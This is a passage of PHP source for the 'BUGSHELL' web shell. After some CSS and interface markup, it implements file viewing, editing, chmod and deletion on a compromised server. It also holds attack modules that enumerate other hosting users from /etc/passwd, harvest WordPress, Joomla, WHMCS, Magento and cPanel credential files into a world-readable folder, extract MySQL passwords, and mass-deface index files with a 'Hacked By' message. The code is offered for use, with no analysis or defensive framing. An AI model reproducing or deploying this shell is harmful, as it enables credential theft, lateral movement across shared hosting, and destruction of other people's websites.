  792.         .hljs-selector-id{color:#8b98ab}
  793.         .hljs-emphasis{font-style:italic}
  794.         .hljs-strong{font-weight:bold}
  795.         .hljs-link{text-decoration:underline}
  796.         #ui_notifIt{
  797.                 position: fixed;
  798.                 top: 10px;
  799.                 right: 10px;
  800.                 left:10px;
  801.                 cursor: pointer;
  802.                 overflow: hidden;
  803.                 -webkit-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  804.                 -moz-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  805.                 -o-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  806.                 box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
  807.                 -wekbit-border-radius: 5px;
  808.                 -moz-border-radius: 5px;
  809.                 -o-border-radius: 5px;
  810.                 border-radius: 5px;
  811.                 z-index: 2000;
  812.         }
  813.         #ui_notifIt:hover{
  814.                 opacity: 1 !important;
  815.         }
  816.         #ui_notifIt p{
  817.                 text-align: center;
  818.                 font-family: sans-serif;
  819.                 font-size: 14px;
  820.                 padding: 0;
  821.                 margin: 0;
  822.         }
  823.         #notifIt_close{
  824.                 position: absolute;
  825.                 color: #FFF;
  826.                 top: 0;
  827.                 padding: 0px 5px;
  828.                 right: 0;
  829.         }
  830.         #notifIt_close:hover {
  831.                 background-color: rgba(255, 255, 255, 0.3);
  832.         }      
  833.         #ui_notifIt.default{
  834.                 background: #242424;
  835.                 border:0px solid #091835;
  836.                 box-shadow:0px 2px 4px rgba(0,0,0,0.4);
  837.         }
  838.        
  839.         /* notifit confirm */
  840.         .notifit_confirm_bg,
  841.         .notifit_prompt_bg{
  842.                 position: fixed;
  843.                 top: 0;
  844.                 left: 0;
  845.                 height: 100%;
  846.                 width: 100%;
  847.                 background-color: rgba(255, 255, 255, 0.1);
  848.         }
  849.         .notifit_confirm *,
  850.         .notifit_prompt *{
  851.                 font-family: sans-serif;
  852.         }
  853.         .notifit_confirm,
  854.         .notifit_prompt{
  855.                 position: fixed;
  856.                 top: 0;
  857.                 left: 0;
  858.                 padding: 30px 30px 0px 30px;
  859.                 background-color: #eee;
  860.                 border: 1px solid rgba(0, 0, 0, 0.1);
  861.                 -webkit-border-radius: 5px;
  862.                 -moz-border-radius: 5px;
  863.                 -ms-border-radius: 5px;
  864.                 -o-border-radius: 5px;
  865.                 border-radius: 5px;
  866.                 -webkit-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
  867.                 box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
  868.     }
  869. option {
  870.     -webkit-transition: all 0.5s;
  871.     -moz-transition: all 0.5s;
  872.      transition: all 0.5s;
  873. }
  874. .move-top {
  875.     position: fixed;
  876.     bottom: 10px;
  877.     right: 10px;
  878.     text-decoration: none;
  879.     padding: 10px;
  880.     display: none;
  881.     cursor:pointer;
  882.     background:rgba(0, 0, 0, 0.2);
  883.     border-radius:5px;
  884. } </style>
  885. <link rel="icon" href="/image/favicon.ico" type="image/x-icon" />
  886. <script>
  887.     baseUrl = window.location.href.split("?")[0];
  888.     window.history.pushState("name", "?", baseUrl);
  889.     function c(x) {
  890.         window.location = x
  891.    }
  892. </script>
  893.         <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
  894.         <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.js"></script>
  895.         <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
  896.     <script src="'.x4.'alert.js"></script>
  897. <style>
  898. .move-top {
  899.     position: fixed;
  900.     bottom: 10px;
  901.     right: 10px;
  902.     text-decoration: none;
  903.     padding: 10px;
  904.     display: none;
  905.     cursor:pointer;
  906.     background:rgba(0, 0, 0, 0.2);
  907.     border-radius:5px;
  908. }</style>
  909. <i class="fa fa-chevron-up move-top"></i>
  910. <script>
  911. jQuery(document).ready(function() {
  912.     var offset = 220;
  913.     var duration = 500;
  914.     jQuery(window).scroll(function() {
  915.         if (jQuery(this).scrollTop() > offset) {
  916.             jQuery(\'.move-top\').fadeIn(duration);
  917.         } else {
  918.             jQuery(\'.move-top\').fadeOut(duration);
  919.         }
  920.     });
  921.     jQuery(\'.move-top\').click(function(event) {
  922.         event.preventDefault();
  923.         jQuery(\'html, body\').animate({scrollTop: 0}, duration);
  924.         return false;
  925.     })
  926. });
  927. </script>
  928. <script>hljs.initHighlightingOnLoad();</script></head><div class="kepala"><div class="co-ontainer">
  929. <table><td style="width:25px">
  930. <b><i class="fa fa-bug"></i></b></td><td>BUGSHELL</td><td style="text-align:right;width:100px">
  931. <button class="nav" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
  932. <button class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
  933. <button class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></td></table></div></div>
  934.  
  935. <div class="co-ontainer-2">
  936. <div class="cover"></div>            
  937. <div class="dir">
  938. <table style="width:100%">
  939. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#1D9D73">ROOT</font> :</td><td class="dir-td-right break">');
  940. foreach($scdir as $c_dir => $cdir) {   
  941.         echo "<a class='a' onclick=\"c('?dir=";
  942.         for($i = 0; $i <= $c_dir; $i++) {
  943.                 echo $scdir[$i];
  944.                 if($i != $c_dir) {
  945.                 echo "/";
  946.                 }
  947.         }
  948.         echo "')\">$cdir</a>/";
  949. }
  950. vars('</td></table></div></th></table></div>');
  951. $filez = basename($_COEG['file']);
  952. $size = filesize("$dir/$filez")/1024;
  953.                         $size = round($size,3);
  954.                         if($size > 1024) {
  955.                                 $size = round($size/1024,2). ' MB';
  956.                         } else {
  957.                                 $size = $size. ' KB';
  958. }
  959. vars('<div class="coL">');
  960. if($_COEG['command'] == 'logout') {    
  961. r($_SERVER['PHP_SELF']);
  962. setcookie('BUGSHELL', time() - 3600);
  963. }  
  964.  
  965. // --- View Source --- //
  966. elseif($_COEG['command'] == 'view') {
  967. echo '<div class="coL-panel"><table>
  968. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
  969. echo '<div class="coL-option">';
  970. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  971. <hr>';
  972. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
  973. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  974. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  975. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  976. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  977. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  978. if(empty($source)) {
  979.         error('Source Not Found !!');
  980.         echo x9;
  981. } else {
  982.         echo "<pre class='top'><code class='php'>".$source."</code></pre>";
  983.         }
  984. }
  985.  
  986. // --- Edit Source --- //
  987. elseif($_COEG['command'] == 'edit') {
  988.         if($_COEG['save']) {
  989.                 $save = file_put_contents($_COEG['file'], $_COEG['src']);
  990.         if($save) {
  991.         success('Source Saved !!');
  992.                 } else {
  993.         error('Permission Denied !!');
  994.         }
  995. }
  996. echo '<div class="coL-panel"><table>
  997. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
  998. echo '<div class="coL-option">
  999. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1000. <hr><table>';
  1001. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  1002. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
  1003. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  1004. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  1005. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1006. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  1007. if(empty($source)) {
  1008.         echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
  1009.         <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
  1010. <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
  1011. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
  1012.         <textarea name='src' class='top'>".$source."</textarea>
  1013. <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
  1014.   }
  1015. }
  1016.  
  1017. // --- Rename File --- //
  1018. elseif($_COEG['command'] == 'rename') {
  1019.                 if($_COEG['rename']) {
  1020.                 $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
  1021.                 if($rename) {
  1022. success('File Renamed !!');
  1023. mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
  1024.    } else {
  1025. error('Permission Denied !!');
  1026.                 }
  1027. }
  1028. echo '<div class="coL-panel"><table>
  1029. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
  1030. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1031. <hr><table>';
  1032. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  1033. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  1034. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
  1035. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  1036. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1037. echo "<div class='coL-option top'>
  1038. <br><br><br>
  1039.         <center>
  1040.                 <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  1041. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  1042. <table cellspacing='0'>
  1043.         <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
  1044.         <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  1045.         </form></div>";
  1046. }
  1047.  
  1048. // --- Chmod File --- //
  1049. else if($_COEG['command'] == 'chmod') {
  1050. if(isset($_COEG['perm'])) {
  1051. if(chmod($_COEG['file'],octdec($_COEG['perm']))) {
  1052. success('Chmod Ok !!');
  1053. mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']);
  1054. } else {
  1055. error('Permission Denied !!');
  1056.         }
  1057. }
  1058. echo '<div class="coL-panel"><table>
  1059. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
  1060. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1061. <hr><table>';
  1062. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  1063. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  1064. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  1065. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
  1066. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1067. echo "<div class='coL-option top'>
  1068. <br><br><br>
  1069.         <center>
  1070.                 <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  1071. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  1072. <table cellspacing='0'>
  1073.         <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
  1074. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
  1075. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
  1076.         <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  1077.         </form></div>";
  1078. }
  1079.  
  1080. // --- Delete File --- //
  1081. elseif($_COEG['command'] == 'delete') {
  1082. $delete = unlink($_COEG['file']);
  1083. if($delete) {
  1084.             vars('<script>c("?'.x5.$dir.'");</script>');
  1085.         } else {
  1086.                 error('Permission Denied !!');
  1087.         }
  1088. }
  1089.  
  1090. // --- Jumping Server --- //
  1091. elseif($_COEG['command'] == 'jumping') {
  1092. echo '<div class="coL-panel"><table>
  1093. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
  1094. $i = 0;
  1095. $s_a = fopen("/etc/passwd", "r");
  1096. while($s_b = fgets($s_a)) {
  1097.         if($s_b == '' || !$s_a) {
  1098.                  error("Can't Read [ /etc/passwd ]");
  1099.                  mtr("?".x5.$dir);
  1100.                  echo x9;
  1101.         } else {
  1102.                 preg_match_all('/(.*?):x:/', $s_b, $s_c);
  1103.                 foreach($s_c[1] as $s_d) {
  1104.                         $s_e = "/home/$s_d/public_html";
  1105.                         if(is_readable($s_e)) {
  1106.                                 $i++;
  1107.                                 $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
  1108.                                 if(is_writable($s_e)) {
  1109.                                         $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
  1110.                                          <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
  1111.                                 }
  1112.                                 echo $s_o;
  1113.                                 $s_k = file_get_contents("/etc/named.conf");   
  1114.                                 if($s_k == '') {
  1115.                                          success('Server Not Found !!');
  1116.                      mtr("?".x5.$dir);
  1117.                       echo x9;
  1118.                                 } else {
  1119.                                         preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
  1120.                                         foreach($s_v[1] as $s_x) {
  1121.                                                 $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
  1122.                                                 $s_g = $s_g['name'];
  1123.                                                 if($s_g == $s_d) {
  1124.                                                         echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
  1125. if($i == 0) {
  1126.          error('Server Not Found !!');
  1127.          mtr("?".x5.$dir);
  1128.          echo x9;
  1129. } else {
  1130.         echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
  1131.         }
  1132. }
  1133.  
  1134. // --- Config Grabber --- //
  1135. elseif($_COEG['command'] == 'config') {
  1136.     $s_t = fopen("/etc/passwd", "r");
  1137.     $s_z = mkdir("bug-config", 0777);
  1138.     $s_s = "Options all\
  1139. Require None\
  1140. Satisfy Any";
  1141.     $s_d = fopen("bug-config/.htaccess","w");
  1142.     fwrite($s_d, $s_s);
  1143.     while($s_q = fgets($s_t)) {
  1144.         if($s_q == "" || !$s_t) {
  1145.     error('Can\'t Read etc/passwd !!');
  1146.         } else {
  1147.             preg_match_all('/(.*?):x:/', $s_q, $s_y);
  1148.             foreach($s_y[1] as $s_p) {
  1149.                 $s_k = "/home/$s_p/public_html/";
  1150.                 if(is_readable($s_k)) {
  1151.                     $s_g = array(
  1152.                         "/home/$s_p/.my.cnf" => "cpanel",
  1153.                         "/home/$s_p/.accesshash" => "WHM-accesshash",
  1154.                         "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
  1155.                         "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
  1156.                         "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1157.                         "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
  1158.                         "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
  1159.                         "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
  1160.                         "/home/$s_p/public_html/forum/config.php" => "phpBB",
  1161.                         "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
  1162.                         "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
  1163.                         "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
  1164.                         "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
  1165.                         "/home/$s_p/public_html/configuration.php" => "Joomla",
  1166.                         "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
  1167.                         "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
  1168.                         "/home/$s_p/public_html/wp-config.php" => "WordPress",
  1169.                         "/home/$s_p/public_html/admin/config.php" => "OpenCart",
  1170.                         "/home/$s_p/public_html/slconfig.php" => "Sitelok",
  1171.                         "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
  1172.                     foreach($s_g as $s_h => $s_l) {
  1173.                         $s_r = file_get_contents($s_h);
  1174.                         if($s_r == '') {
  1175.                         } else {
  1176.                             $fcS = fopen("bug-config/$s_p-$s_l.txt","w");
  1177.                             fputs($fcS,$s_r);
  1178.                         }}}}}}
  1179. success('OK !!');
  1180. vars("<script>c('?".x5.$dir."/bug-config');</script>");
  1181. }
  1182.  
  1183.  
  1184. // --- Cookies Manager --- //
  1185. elseif($_COEG['command'] == 'cookie') {
  1186. vars('<div class="coL-panel"><table>
  1187. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">COOKIES MANAGER</td></table></div>');
  1188. vars("<table class='table-info' cellspacing='0'>");
  1189. vars("<th class='th-info cookie-td'><center>Name</center></th><th class='th-info' style='width:30px'><center><i class='fa fa-angle-right'></i></th><th class='th-info'><center>Value</center></th><tr class='ex-hov'>");
  1190. if(count($_COOKIE) != 0) {
  1191. foreach($_COOKIE as $c1 => $c2) {
  1192. echo "<td class='td-info break'>".$c1."</td><td class='td-info' style='width:30px'><center><i class='fa fa-angle-right'></i></td><td class='td-info break'>".$c2."</td><tr class='ex-hov'>";
  1193. }
  1194. vars("</table>");
  1195. }
  1196. vars('<div class="coL-option" style="padding:7px">');
  1197. vars("<table><td style='text-align:center;width:20px'><span class='label label-default'><i class='fa fa-angle-right'></i></span></td><td> Cookies Found : [ <font color='1D9D73'> ".count($_COOKIE)."</font> ]</td></table></div>");
  1198. if(isset($_POST['c3'])) {
  1199. if(setcookie($_POST['c3'],$_POST['c2'])) {
  1200.         success('Cookie Created !!');
  1201.         mtr('?'.x7.'cookie&'.x5.$dir);
  1202. } else {
  1203.         error('Permission Denied !!');
  1204.         }
  1205. }
  1206. echo '<form style="margin:0px" action="?'.x7.'cookie&'.x5.$dir.'" method="POST">
  1207. <table cellspacing="0" class="top">
  1208. <td><input type="text" placeholder="Name" name="c3"></td>
  1209. <td><input type="text" placeholder="Value" name="c2"></td>
  1210. <td style="width:50px"><button class="btn-exe" type="submit"><i class="fa fa-arrow-circle-right"></i></button></td></table></form>';
  1211. }
  1212.  
  1213. // --- cpanel finder  --- //
  1214. elseif($_COEG['command'] == 'cpanel') {
  1215. echo '<div class="coL-panel"><table>
  1216. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
  1217. @ini_set('display_errors',0);
  1218. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1219.     $ar0=explode($marqueurDebutLien, $text);
  1220.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1221.     return trim($ar1[0]);
  1222. }
  1223. $d0mains = @file('/etc/named.conf');
  1224. $domains = scandir("/var/named");
  1225. if ($domains or $d0mains) {
  1226.     $domains = scandir("/var/named");
  1227.     if($domains) {
  1228. echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
  1229. $count=1;
  1230. $dc = 0;
  1231. $list = scandir("/var/named");
  1232. foreach($list as $domain){
  1233. if(strpos($domain,".db")){
  1234. $domain = str_replace('.db','',$domain);
  1235. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1236. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1237. $path = getcwd();
  1238. if (is_readable($dirz)) {
  1239. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1240. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1241. $password=entre2v2($p,'password="','"');
  1242. echo "<tr>
  1243. <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
  1244. <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
  1245. $dc++; }}}
  1246. echo '</table>';
  1247. $total = $dc;
  1248. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
  1249. }else{
  1250. $d0mains = @file('/etc/named.conf');
  1251.     if($d0mains) {
  1252. echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
  1253. $count=1;
  1254. $dc = 0;
  1255. $mck = array();
  1256. foreach($d0mains as $d0main){
  1257.     if(@eregi('zone',$d0main)){
  1258.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1259.         flush();
  1260.         if(strlen(trim($domain[1][0])) >2){
  1261.             $mck[] = $domain[1][0];
  1262.         } } }
  1263. $mck = array_unique($mck);
  1264. $usr = array();
  1265. $dmn = array();
  1266. foreach($mck as $o) {
  1267.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1268.     $usr[] = $infos['name'];
  1269.     $dmn[] = $o;
  1270. }
  1271. array_multisort($usr,$dmn);
  1272. $dt = file('/etc/passwd');
  1273. $passwd = array();
  1274. foreach($dt as $d) {
  1275.     $r = explode(':',$d);
  1276.     if(strpos($r[5],'home')) {
  1277.         $passwd[$r[0]] = $r[5];
  1278.     }
  1279. }
  1280. $l=0;
  1281. $j=1;
  1282. foreach($usr as $r) {
  1283. $dirz = '/home/'.$r.'/.my.cnf';
  1284. $path = getcwd();
  1285. if (is_readable($dirz)) {
  1286. copy($dirz, $path.'/'.$r.'.txt');
  1287. $p=file_get_contents($path.'/'.$r.'.txt');
  1288. $password=entre2v2($p,'password="','"');
  1289. echo "<tr>
  1290. <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
  1291. <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
  1292. $dc++;
  1293.                 flush();
  1294.                 $l=$l?0:1;
  1295.                 $j++;
  1296.                 }
  1297.         }
  1298. }
  1299. echo '</table>';
  1300. $total = $dc;
  1301. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
  1302.         }
  1303. } else{
  1304.         error('Access Disabled !!');
  1305.     mtr('?'.x5.$dir);
  1306.         echo x9;
  1307.         }
  1308. }
  1309.  
  1310. // --- Mass Deface --- //
  1311. elseif($_COEG['command'] == 'massdef') {
  1312. echo '<div class="coL-panel"><table>
  1313. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MASS DEFACE</td></table></div>';
  1314. echo '<div class="coL-option">';
  1315. echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
  1316. echo "<table cellspacing='0'>
  1317. <td align='left' style='padding:7px;width:60px'>
  1318. Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
  1319. echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='index.php' style='width:100%' placeholder=''></td></tr></table>";
  1320. echo "<br>Source :<br><br>
  1321. <textarea name='index'># Hacked By Wildan Izzudin !!</textarea>";
  1322. echo "<input type='submit' value='CROT' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
  1323. if (isset ($_COEG['base_dir']))
  1324. {
  1325.         if (!file_exists ($_COEG['base_dir'])) {
  1326.  $alert = "Destination Not Found !";
  1327.  failed1($alert); }
  1328.         @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
  1329.  
  1330.         $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
  1331.         foreach ($files as $file):
  1332.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  1333.                 {
  1334.                         $index = getcwd ()."/".$file."/".$_COEG['file_name'];
  1335.                         if (file_put_contents ($index, $_COEG['index']))
  1336.                                 echo "
  1337.                 <div class='coL-option break wrap' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span>  $index </span></div>"; }
  1338.         endforeach;
  1339.         }
  1340. }
  1341.  
  1342. // --- Multi Hash --- //
  1343. elseif($_COEG['command'] == 'multihash') {
  1344. vars('<div class="coL-panel"><table>
  1345. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI HASH</td></table></div>');
  1346. if($_COEG['encrypt']) {
  1347.         switch($_COEG['id']) {
  1348.                 case '1':
  1349. if(md5($_COEG['text'])) {
  1350. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1351. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td></table></div>"); } else {
  1352.         error('Permission Denied !!');
  1353.         }
  1354. break;
  1355. case '2':
  1356. if(crc32($_COEG['text'])) {
  1357. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1358. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td></table></div>"); } else {
  1359.         error('Permission Denied !!');
  1360.         }
  1361. break;
  1362. case '3':
  1363. if(sha1($_COEG['text'])) {
  1364. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1365. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>"); } else {
  1366.         error('Permission Denied !!');
  1367.         }
  1368. break;
  1369. case '4':
  1370. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1371. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr>
  1372. <td class='td-md5'
  1373. style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td><tr>
  1374. <td class='td-md5'
  1375. style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td><tr>
  1376. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>");
  1377. break;
  1378.         }
  1379. }
  1380. vars("<div class='coL-option top'>
  1381.         <form action='?".x7."multihash&".x5.$dir."' method='post'>
  1382. <table style='width:100%'>
  1383.         <td style='width:20%'>Text :</td><td style='width:80%'>
